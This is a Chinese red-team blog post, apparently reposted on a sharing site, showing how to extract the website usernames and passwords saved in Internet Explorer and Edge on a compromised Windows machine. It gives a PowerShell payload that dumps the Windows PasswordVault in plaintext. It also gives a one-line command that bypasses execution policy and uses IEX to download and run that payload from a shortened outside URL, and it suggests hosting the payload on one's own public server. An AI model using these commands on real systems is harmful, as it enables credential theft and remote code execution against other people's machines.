打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
一条命令获取 IE 浏览器保存网站的账号和密码信息

渗透攻击红队

一个专注于红队攻击的公众号

大家好,这里是 渗透攻击红队 的第 41 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

Powershell

内网渗透一直以来都是一个热门话题,试想在一个大型的内网环境下,当我们拿到了内网windows机器后,我们该如何通过他们去获取更多的所需资源,这就需要我们进行内网渗透了。然而在内网渗透中,除了kali、metasploit等高能的存在以外,还有一款神器也常常容易遭到忽略----PowerShell

Powershell 获取 IE 浏览器的账户密码信息

Powershell

首先需要的是一段 Powershell Payload:

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]$vault = New-Object Windows.Security.Credentials.PasswordVault$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password

我们可以把他放到公网上,这里有老外现成的了:http://bit.ly/2K75g15


如果你不想用它的域名,你也可以把 Powershell Payload 放到你自己的公网服务器上,然后使用 Powershell 调用它即可:

powershell -nop -exec bypass -c 'IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')'

这个时候就能获取到你 IE 浏览器中的缓存信息,查找你保存的账户和密码信息。


参考文章:

https://github.com/HanseSecure/credgrap_ie_edge


渗透攻击红队

一个专注于渗透红队攻击的公众号

点分享
点点赞
点在看
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
通过Azure PowerShell管理Windows Azure
忘了密码 这三大浏览器帮你想
Windows 7系统IE8浏览器如何启用或禁用自动保存网页密码的功能?
设置简单又方便 手把手包你会6种电脑小技巧
让IE浏览器默认记住密码
Win10春风得意 Edge痛哭流涕
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服